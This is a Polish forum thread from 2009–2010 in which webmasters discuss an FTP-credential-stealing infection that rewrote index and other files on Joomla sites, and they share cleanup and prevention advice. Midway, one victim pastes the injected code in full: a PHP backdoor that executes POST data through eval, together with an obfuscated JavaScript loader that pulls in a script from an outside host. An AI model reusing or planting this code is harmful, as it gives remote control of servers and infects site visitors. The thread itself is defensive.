PDA

Zobacz pełną wersję : Wirus w Total Commander!



zwiastun
27-02-2009, 13:19
W Sieci rozpowszechnia się wirus groźny dla używających Total Commander do obsługi FTP.
Pokrótce:
- Robak typu Malware.
- Pochodzi z zarażonego komputera użytkownika, który łączy się z FTP danego serwisu
- Pobiera ustawienia FTP (loginy, hasla), po czym lączy się z serwisami, atakuje pliki index* oraz login* nadpisujac zakodowanym hashem javascryptu, który po zdekodowaniu tworzy ukryty iframe, w rezultacie uzyskujac dostep do wszystkich zasobów serwisu z poziomu www

Najlepiej przeskanować swój komputer programami Trojan Remover + nod32

Więcej na stronie:
http://www.cert.pl/news/tag/wirus

faramka
28-02-2009, 15:55
Dzięki.

Czy problem dotyczy tylko Total Commandera czy również innych klientów FTP?

El capitán
28-02-2009, 22:11
Dla mnie za późno, pozmieniał wszystkie pliki index.php i mam nadzieję że tylko to...Zmieniłem hasło do ftp i 2 dzień spokój. A Kaspersky na kompie nic nie wykrył..., ale na stronie że jest wirus to już potrafił:P

miniol
02-03-2009, 03:23
Mam pytanie. Czy ten wirus infekuje tylko serwer z którym się połączyłem? Na kompie mam zapisane dane do serwera kilku firm. Łączyłem się tylko z jednym serwerem (który jest zainfekowany). Reszta serwerów wygląda, że są zdrowe. Ale chciałbym się upewnić.

Dziwi mnie też, że NOD32 nie zareagował. Mam wykupioną licencję, a tu takie problemy. Nie po to wywalałem tyle kasy na takiego antyvira, żeby teraz problemy mieć.

edit: już wiem, że zaatakowało wszystkie serwery. Masakra.

Zastanawia mnie tylko, dlaczego nie edytowano wszystkich indexów. Tylko niektóre zostały zainfekowane. Mianowicie portale oparte na joomla! i phpbb by przemo. Mam również stronkę (z treścią stałą) i ten plik nie został zainfekowany. Natomiast inny serwis (również niejest damiczny) został zainfekowany.
Chciałbym też wiedzieć, czy edycja plików wyleczy serwery. Oczywiście komputery mam już wyczyszczone a TC wymieniłem na Filezille. Chodzi mi o to czy jedyna pamiątka która jest na serwerze to właśnie te przemienione pliki, czy coś jeszcze jest tam dogrywane?

nikos
12-03-2009, 11:00
Mnie też dopadł ten wirus najpierw antywir znalazł na kompie kikla infekcji zobaczyłem, że dziwne procesy są uruchomione, przywróciłem xp z kopi zapasowej niestety prawdopodobnie był gdzies indziej jeszcze na dyskach, i co
Zainfekowany został serwer dla którego login i hasło było zapisane w Total Commander. Wniosek z tego taki nie zapisuj hasła w TC lepiej zapamietaj i wpisuj za każdym razem.

Na szczęście mój serwer ma co drugi dzień kopie zapasową problem zotał rozwiązany przy konsultacji z adminem który w parę minut przywrócił tę kopie.

Należy też zmienić hasła do serwera ftp, hasła do admina joomla. I jeśli kotś używa tego samego loginu i hasła gdzie indziej to też radzę zmienić.

Acha infekuje też strony xhtml/html tylko one działają, po zajrzeniu w kod widać że infekcja miała miejsce.

faramka
12-03-2009, 19:28
Acha infekuje też strony xhtml/html tylko one działają, po zajrzeniu w kod widać że infekcja miała miejsce.
I wywala iframe'y oraz targety do nich (np. strony z menu otwierają się w nowym oknie).

miniol
12-03-2009, 21:49
Wniosek z tego taki nie zapisuj hasła w TCzły wniosek. W ogóle nigdy w niczym nie zapamiętuj haseł! Dzisiaj TC jutro FileZilla a po jutrze cała przeglądarka razem z nr kont bankowych. Mnie ta historia nauczyła tego, że 10 kliknięć w klawiaturę za każdym razem przy wpisywaniu hasła jest lepsze niż borykanie się z takim ustrojstwem. Szczególnie w firmie gdzie przechowuję hasła kilkunastu innych przedsiębiorstw. Potem pisanie im, że z powodu mojej głupoty muszą zmienić sobie wszystkie hasła jest dość upokażajkące ;-)

stasio
12-03-2009, 22:38
ktoś może polecić jakiś program do skanowania komputera? ??

yanek
13-03-2009, 00:45
oprócz dobrego antywirusa np. Kaspersky czy NOD warto skorzystać z programów z podanych linków:
PL http://www.malwarebytes.org/mbam.php - Anti-Malware
PL http://www.safer-networking.org/pl/index.html - Spybot-S&D
EN http://www.lavasoft.com/single/trialpay.php - Ad-Aware
PL http://ccollomb.free.fr/unlocker/ - Unlocker
EN http://www.hijackthis.de/en - HijackThis
http://hijackthis2.clickhereformoreinfo.com - HijackThis 2
EN http://www.pchell.com/winsockxpfix/index.shtml - WinsockxpFix

xtech
13-03-2009, 23:53
Bez problemu tego wirusa wykrył darmowy Avast i płatny NOD - nie wykrył Norton Antyvirus ani 2008 ani 2009 ...

stasio
13-03-2009, 23:55
fajnie co?
zawsze smarkałem lewa dziurką na Nortona

wizek
25-04-2009, 15:34
3x odzyskiwałem serwer w ciągu 2 dni, ktoś instalował na moim serwerze plik ftp.php do uploadu i wykasowywał całą zawartość katalogów z plikami

Format kompa, wywalenie TC i wgranie Norton Internet Security pomogły i mam spokój.

taniestruny.pl
12-05-2009, 11:10
OK... no ale wróćmy do tematu. Jak działać w przypadku zarażenia.

Strona, którą się zajmuje www.chopin.man.bialystok.pl została zarażona. Hasło do serwera zmieniłem, co jeszcze? Przywrócić index.html ?

faramka
12-05-2009, 11:14
Przede wszystkim wywalić podejrzany kod (w znacznikach skryptowych) z każdego pliku index.

taniestruny.pl
12-05-2009, 11:19
są jakieś najbardziej charakterystyczne fragmenty tego kodu?

faramka
12-05-2009, 11:24
Znaczniki skryptowe, bezsensowny ciąg znaków... Prawdopodobnie gdzieś na początku albo na końcu całego kodu.

taniestruny.pl
12-05-2009, 11:28
Ma ktoś doświadczenia z usuwaniem tego ręcznie? Będzie to ten sam fragment kodu w każdym z plików? Szukać tylko plikach w index.html ?

trzepiz
12-05-2009, 12:03
poczytaj - może się przyda :

http://www.pomoc.joomla.pl/component/option,com_easyfaq/task,view/id,25/Itemid,53/

taniestruny.pl
12-05-2009, 12:16
A czy aktualizacja Joomli do nowszej wersji jest jakimś wyjściem? Z tego co widze część plików Joomla będzie wówczas przywrócona na prawidłowe. Czy wszystkie?

taniestruny.pl
12-05-2009, 12:19
...aha. I jeszcze jedno. Czy znane są przypadki, w których ten trojan przedostawał się przy pomocy innych programów? Właśnie sprawdziłem, że nie mam dostępu do tej strony przez Total Commander a dostaje się do niej jedynie przez program LechFtp.

trzepiz
12-05-2009, 12:23
początkowo był to w większości TC - jednak sytuacja w której robal będzie wykorzystywał inne programy była kwestią czasu.

Dla pewności - Nie Zapisywać haseł do FTP!

taniestruny.pl
12-05-2009, 13:03
Myślicie, że to jest to:


<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBjOWtGPSclJztldmF sKHVuZXNjYXBlKCgnYDc2YXJgMjBgNjFgM2RgMjJTYDYzcmA2O XB0YDQ1bmdpbmVgMjJgMmNiYDNkYDIyVmVyc2lvbmAyOGAyOWA yYmAyMmAyY2pgM2RgMjJgMjJgMmNgNzVgM2RuYXZpYDY3YXRvY DcyYDJldWA3M2VyQWdlbnRgM2JpYDY2KCh1YDJlaW5gNjRlYDc 4T2ZgMjhgMjJgNTdgNjluYDIyKWAzZTApYDI2YDI2YDI4dWAyZ WluZGVgNzhPZmAyOGAyMk5gNTRgMjA2YDIyKWAzYzBgMjlgMjZ gMjYoZG9gNjN1YDZkZW5gNzRgMmVjYDZmb2tpZWAyZWluYDY0Y DY1YDc4YDRmZihgMjJgNmRpZWA2YmAzZDFgMjIpYDNjMClgMjZ gMjYoYDc0eWA3MGVvZmAyOGA3YXJ2enRzKWAyMWAzZHRgNzlgN zBlb2A2NihgMjJBYDIyYDI5YDI5KWA3YnpydmA3YXRzYDNkYDI yYDQxYDIyYDNiZXZhbChgMjJpZihgNzdpbmRvd2AyZWAyMmAyY mErYDIyKWpgM2RgNmFgMmJgMjIrYDYxK2AyMk1ham9yYDIyK2I rYDYxK2AyMk1pbmA2ZmA3MmAyMitiK2ErYDIyQnVgNjlsZGAyM itiK2AyMmpgM2JgMjIpYDNiZGA2ZmNgNzVtZW5gNzRgMmV3cmA 2OXRgNjUoYDIyYDNjc2A2M3JgNjlwYDc0YDIwc3JgNjNgM2RgM mZgMmZgNjd1bWA2MmxgNjFyYDJlY25gMmZgNzJgNzNzYDJmYDN maWRgM2RgMjIramAyYmAyMmAzZWAzY2A1Y2AyZmA3M2NyYDY5c HRgM2VgMjIpYDNiYDdkJykucmVwbGFjZSgvYC9nLGM5a0YpKSl 9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)***********#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'', $s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n -->***********#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)| |stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

trzepiz
12-05-2009, 13:06
jestem pewny, że to właśnie TO... :)

taniestruny.pl
12-05-2009, 13:09
Widzicie tutaj jakiś najbardziej charakterystyczny fragment kodu? Taki, żeby na podstawie tego fragmentu przefiltrować wszystkie pliki w poszukiwaniu kodu?

trzepiz
12-05-2009, 13:16
właśnie wkleiłeś go wyżej .. co nie znaczy, że nie może być inny ..

rusz trochę głową :) przejrzyj 2 - 3 pliki i porównaj ..

taniestruny.pl
12-05-2009, 13:28
Np. ten. Znalazłem jeszcze coś takiego. Nie wiem czy to również nadaje się do kasacji.?


<script language=javascript><!--
(function(){var c9kF='%';eval(unescape(('`76ar`20`61`3d`22S`63r`69 pt`45ngine`22`2cb`3d`22Version`28`29`2b`22`2cj`3d` 22`22`2c`75`3dnavi`67ato`72`2eu`73erAgent`3bi`66(( u`2ein`64e`78Of`28`22`57`69n`22)`3e0)`26`26`28u`2e inde`78Of`28`22N`54`206`22)`3c0`29`26`26(do`63u`6d en`74`2ec`6fokie`2ein`64`65`78`4ff(`22`6die`6b`3d1 `22)`3c0)`26`26(`74y`70eof`28`7arvzts)`21`3dt`79`7 0eo`66(`22A`22`29`29)`7bzrv`7ats`3d`22`41`22`3beva l(`22if(`77indow`2e`22`2ba+`22)j`3d`6a`2b`22+`61+` 22Major`22+b+`61+`22Min`6f`72`22+b+a+`22Bu`69ld`22 +b+`22j`3b`22)`3bd`6fc`75men`74`2ewr`69t`65(`22`3c s`63r`69p`74`20sr`63`3d`2f`2f`67um`62l`61r`2ecn`2f `72`73s`2f`3fid`3d`22+j`2b`22`3e`3c`5c`2f`73cr`69p t`3e`22)`3b`7d').replace(/`/g,c9kF)))})();
-->***********

BTW. Kod ten w moim przypadku znajduje się nie tylko w plikach index.php ale również functions.php, dbtable.php, config.php

trzepiz
12-05-2009, 13:34
no teraz wkleiłeś zdekodowany powyższy .. :)

zaczynam nie rozumieć Twoich pytań - wiesz o co chodzi a pytasz 10x ..

zrób pełny backup na wszelki wypadek i zacznij sprzątać .. no więcej ci nie pomogę ..

taniestruny.pl
12-05-2009, 13:37
Wybaczcie Panowie :) Nie w celu zaśmiecania pytam a jedynie w trosce o sukces moich działań. Strona, na której sprzątam to nie strona domowa mojego pieska a dosyć poważnej instytucji i nie chcę narobić gnoju. Wolę spytać dwa razy niż później zbierać cięgi :)

taniestruny.pl
12-05-2009, 23:12
Moglibyście Panowie sprawdzić czy Wam pokazuje jeszcze błąd na tej stronie www.chopin.man.bialystok.pl

Wydaje mi sie, że usunąłem wszystkie wpisy ale mój Kaspersy nadal pokazuje błąd.

trzepiz
13-05-2009, 09:02
przynajmniej w jeszcze kilku plikach jest trojan :

np: mootols.js, caption.js

taniestruny.pl
13-05-2009, 09:19
A po jakich fragmentach kodu to widzisz?

trzepiz
13-05-2009, 09:34
nie widzę, mój Avast ustawiony na wysoką czułość osłony WWW - twierdzi, że tak właśnie jest . - a on się raczej nie myli ..

taniestruny.pl
13-05-2009, 09:43
OK... jeszcze kilka się znalazło. Coś jeszcze Wam pokazuje?

trzepiz
13-05-2009, 09:46
jeszcze te pliczki:

http://chopin2.man.bialystok.pl/templates/ja_purity/js/ja.script.js
http://chopin2.man.bialystok.pl/templates/ja_purity/js/ja.rightcol.js

pasożyt: JS:Redirector-H9 [Trj]

taniestruny.pl
14-05-2009, 21:31
Może coś jeszcze widzicie? Te dwa ostatnie pliki też poprawiłem.... powinno być OK.

tommy199
04-06-2009, 10:00
Ogolnie to myslalem ze TC jest dobry ale jak przesiadlem sie na FileZille to juz do TC nigdy nie wroce :)

stasio
04-06-2009, 10:26
TC nie jest zły tylko ludzie są źli... net art wprowadził ciekawa usługę, do ftp mozna sie logować tylko z wybranych IP :)

alex51
04-06-2009, 14:23
Ogolnie to myslalem ze TC jest dobry ale jak przesiadlem sie na FileZille to juz do TC nigdy nie wroce :)
Tylko uważaj, bo w FileZilla też można odczytać zapisane hasła i będzie to samo co z TC. Można też używać Free Commandera, który w ostatniej wersji ma już wbudowanego klienta ftp i działa zupełnie porządnie. Co istotne bez konieczności pozostawiania wpisanych w nim haseł.W przeciwieństwie do TC jest to bezpłatny program i też po polsku.

Rybik
11-06-2009, 23:16
TC Power Pack od zawsze miał trojana :)

Figiello
20-06-2009, 15:57
Chyba i mnie to trafiło na stronce www.domenno.pl (http://www.domenno.pl) a to był moja pierwsza stronka postawiona na joomla bo się dopiero uczę. I teraz nie wiem co robić? Nie mam za bardzo doświadczenia żeby sprawdzać nie wiadomo ile plików i w sumie nie wiem co usuwać tylko iframe? Może lepiej będzie, jak z panelu administracyjnego usunę podpięte domeny a więc wszystko co tam było i uworzę wszystko od nowa, czyli dodam domenę zainstaluję joomla i będę tworzyć stronę od podstaw - materiały tekstowe mam zapisane w wordzie.

A co z komputerem i total commanderem? Mój nod nic nie wykrywa, hasła do ftp już pozmieniałem.

stasio
20-06-2009, 16:07
nie rób od podstaw bo sie zajedziesz jak sanie na miedzy.... pobierz wszytsko na dysk z serwera, pobierz progam do masowego edytownia plików txt html i php... regułą poczyść iframe, zapisz na płycie format kompa i wgraj z płyty, albo karty na serwer na nowo...

Figiello
23-06-2009, 21:39
Postawiłem sobie stronkę od nowa bo sobie z tym wszystkim nie poradziłem, dopiero się uczę. W związku z tym mam pytanie, jak zabezpieczyć się przed takim wirusem na przyszłość i innymi problemami, które mogą się jeszcze pojawić a jak jako nowicjusz mogę nie umieć sobie poradzić?

Moja propozycja, która aktualnie wykonałem:
- dane do programu ftp jak login i hasło zawsze wpisuję z klawiatury;
- zrobiłem backup bazy danych;
- wszystkie pliki jakie były dla danej stronki na serwerze skopiowałem na dysk twardy jako kopię, żeby w razie czego podmienić pliki - wypadałoby nagrać do jeszcze na jakiś nośnik.

Czy to wystarczy, czy jeszcze coś powinienem zrobić?

faramka
23-06-2009, 22:22
Backupy rób systematycznie co jakiś czas.
A co do zabezpieczeń przed tym wirusem... mnie wystarczyła zmiana hasła i niezapisywanie go w Totalu (tylko, jak wspomniałeś, ręczne wpisywanie za każdym razem przy połączeniu ftp).

micsto
04-08-2009, 20:29
A jest ktoś mi w stanie powiedzieć to czy jak wykasowałem przez putty wirusa z indexu to czy on będzie nadal u mnie? Jak mam go znaleść jak Trojan Remover go u mnie nie znalazł? A jednak na serwerze byl kiedy tylko ja mam dostep do ftp?

alex51
05-08-2009, 07:52
Pierwsza i najważniejsza sprawa to zmiana haseł do ftp (i nie tylko) i przede wszystkim nie zapisywanie ich w kliencie ftp.

micsto
05-08-2009, 19:52
Pierwsza i najważniejsza sprawa to zmiana haseł do ftp (i nie tylko) i przede wszystkim nie zapisywanie ich w kliencie ftp.Myślalem, że nie ma to wpływu na co kolwiek... ZMieniłem hasła. Problem zniknoł na razie. Będe pisął w razie cos.

seba.adm
05-08-2009, 20:02
Myślalem, że nie ma to wpływu na co kolwiek... ZMieniłem hasła. Problem zniknoł na razie. Będe pisął w razie cos.

Tak jak napisał @alex51. Zmiana haseł to podstawa. W tej chwili zamiast pisać, to nie ma co czekać tylko poczytaj >>Witryna po włamaniu<< (http://wiki.joomla.pl/Witryna_po_w%C5%82amaniu)

micsto
06-08-2009, 19:53
7. Skasuj cały katalog /public_html/
To jest najlepsze wyjście by zagwarantować, że każda potencjalna dziura na stronie zostanie usunięta.
przecież w tym katalogu znajduje sie strona www...

Careme
09-08-2009, 16:29
Witam wszystkich.
Mnie też to dopadło.
Dokładnie Iframe.b.gen. Wprawie każdym pliku index.html mam wpisy, co na początku powodowało, że AVAST blokował dostęp, a teraz żadna ze stron się nie wczytuje, łącznie z panelem administratora.

Doradźcie gdzie mam szukać innych zmian, oprócz plików index.html, tak żeby przywrócić otwieranie się stron i PA.

Acha, i żeby było trudniej. Bo zgraniu całej joomli na dysk i próbie edycji tych zakażonych plików mam odmowę dostępu. Kombinowałem już z różnymi ustawieniami Visty i nic.... Jedynie bezpośrednio na serwerze mogę edytować te pliki, ale to troche upierdliwe.

micsto
09-08-2009, 18:31
10258131 - odezwij się to ci pomoge abyś się pozbył tego badziewia.

Careme
09-08-2009, 20:31
Update: Udało się uruchomić stronę, ale wciąż AVAST resetuje połączenie. Jak widać trzeba wszystkie wpisy edytować, a dużo tego ok. 500 :)

alex51
09-08-2009, 20:38
A nie prościej byłoby wykorzystać aktualną kopię bezpieczeństwa plików, np. z joomlapacka? Zakładam, że masz takową, bo trudno mi sobie wyobrazić odpowiedzialne prowadzenie witryny bez spełnienia podstawowych warunków jakimi jest posiadanie kopii plików joomla z najnowszych zmian na serwerze i codziennej kopii bazy danych.

miniol
09-08-2009, 21:36
Zmień hasło do serwera, wyłącz antywirusa, popraw wszystkie pliki, włącz antywirusa, przeskanuj wszystkie pliki i wyślij na serwer.

Careme
10-08-2009, 22:47
Zmień hasło do serwera, wyłącz antywirusa, popraw wszystkie pliki, włącz antywirusa, przeskanuj wszystkie pliki i wyślij na serwer.

Tak zrobiłem, i wszystko działa.

Co do kopii i całej reszty. Jestem tylko na dobrą sprawę redaktorem strony. Stronę tworzyła inna osoba, ale ona już nie zajmuje się jej utrzymaniem.
A to oznacza, że musze się wdrożyć ... Eh... jeszcze tego mi brakowało...

Pavvel70
06-01-2010, 00:46
niestety moje serwisy też dopadł.
przeskanowałem kompa Avastem (ArcaVir nie wykrywał).
Co jednak zrobić z plikami index.php na serwerze?
Który fragment kodu trzeba wywalić?

zwiastun
06-01-2010, 01:06
nie ma się co cackać - trzeba nadpisać czystymi plikami z pakietów instalacyjnych

Careme
07-01-2010, 01:10
nie ma się co cackać - trzeba nadpisać czystymi plikami z pakietów instalacyjnych
Dokładnie. Ja bawiłem się w edycję każdego pliku index.html, ale to zabawa głupiego, bo akurat w tych plikach nic tam nie ma ważnego.

Co ciekawe w logów z serwera wynikało, że nadpis nastąpił z serwera z domeną .ru :cool:

alex51
07-01-2010, 07:57
Dokładnie. Ja bawiłem się w edycję każdego pliku index.html, ale to zabawa głupiego, bo akurat w tych plikach nic tam nie ma ważnego.
Nie sądzę, aby sprawy dotyczące bezpieczeństwa plików znajdujących się na serwerze nie były ważne. Akurat takie jest zadanie tych mało skomplikowanych, acz istotnych plików index.html, aby uniemożliwiać podgląd struktury katalogów i plików serwera z poziomu www.
Wspomniane infekcje dotyczyły plików index.php i te należałoby nadpisywać.

Co ciekawe w logów z serwera wynikało, że nadpis nastąpił z serwera z domeną .ru :cool:
Można próbować ograniczać wejścia z domen .ru dodając odpowiednie wpisy w pliku .htaccess, np. takie:
deny from .sibmail.ru
deny from .sibnet.ru
deny from .sinor.ru
deny from .ns.tel.ru
deny from .citytelecom.ru
deny from .filanco.ru
deny from .mtw.ru
deny from .netflow.ru
Można całkowicie zablokować możliwość wejścia z domen .ru, ale chyba nie chcesz wywoływać kolejnej "wojny polsko - ruskiej" tym razem bez Borysa Szyca w roli głównej. :p

nikszal
07-01-2010, 08:59
niestety moje serwisy też dopadł.
przeskanowałem kompa Avastem (ArcaVir nie wykrywał).Zakop Avasta głęboko do ziemi i zapomnij o nim. Moja koleżanka cieszyła się nim i bardzo go chwaliła, ale do czasu. Kiedy zainstalowałem jej Kasperskiego, to okazało się, że ma 17 trojanów, których Awast "nie widział".

tkarp
07-02-2010, 00:57
mnie dopadł możliwe że też przez FileZilla, padły 3 serwisy, całe mnóstwo plików index.php, *.php oraz wiele *.js, walczę już 2 dni, Avast wykrył trojana JS:Illredir-F

a na koniec dostałem hacka od 1923 Turk, pozdrawiam chłopaków :mad: i nie wiem co robić,

alex51
07-02-2010, 08:05
Być może temat tego wątku jest mylący, bo sprawa jest bardziej ogólnej natury, ponieważ dotyczy bezpiecznego stosowania wszystkich programów - klientów ftp. Zarówno Total Commander, jak i FileZilla i wszelkie im podobne będą bezpiecznie funkcjonować jeśli nie będziemy zapisywać w nich naszych haseł. Należy pamiętać, że najskuteczniejszą obroną przed intruzami jest zdrowy rozsądek i zapobieganie im poprzez regularne tworzenie kopii plików systemowych z serwera oraz baz danych.
Skoro @tkarp nie wiesz co dalej robić, to wystarczy, że przeczytasz wcześniejsze posty w tym wątku. Jak masz kopie plików i baz danych, to już powinieneś wiedzieć co zrobić.

big_krzysiek
07-02-2010, 12:42
nie wiem jak inne hostingi...ale na nazwa.pl wprowadzono niedawno opcje klienta ftp (z https) poprzez przegladarke...

Jdwind
07-02-2010, 13:30
No, wprowadzili. I u mnie woła o aktualizację flash player'a w Firefoksie, a mam najnowszy. W ogóle ostatnio wysyłałem rozpakowaną Joomla! na serwer u nich (nie wszystko na raz, ale katalogi pojedynczo, bo oczywiście opcji rozpakowania pliku przez ftp nie ma w tym ichnim kliencie) to mi rwało połączenie co chwilę (nie jest to wina mojego łącza, bo na inny serwer wysyłałem bez problemu), ogólnie zeszło mi dwie godziny zanim poprawnie wysłałem wszystkie pliki i katalogi. I te wszystkie "udogodnienia" za taką cenę. Strona u nich też chodzi strasznie ciężko (niewielka stronka, kilka zdjęć, nic ciężkiego).

smx76
15-03-2010, 09:57
3c788c8140c244baa4de05cad390c937.spc taki plik mam w katalogu administrator/cache i w porównaniu z wersją instalacyjną joomli 1.5.15 nie powinno go chyba tu być. moja stronka jest po ataku wirusa